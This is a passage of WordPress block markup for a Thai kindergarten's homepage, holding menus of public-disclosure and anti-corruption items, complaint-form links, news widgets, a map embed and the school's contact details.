{\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 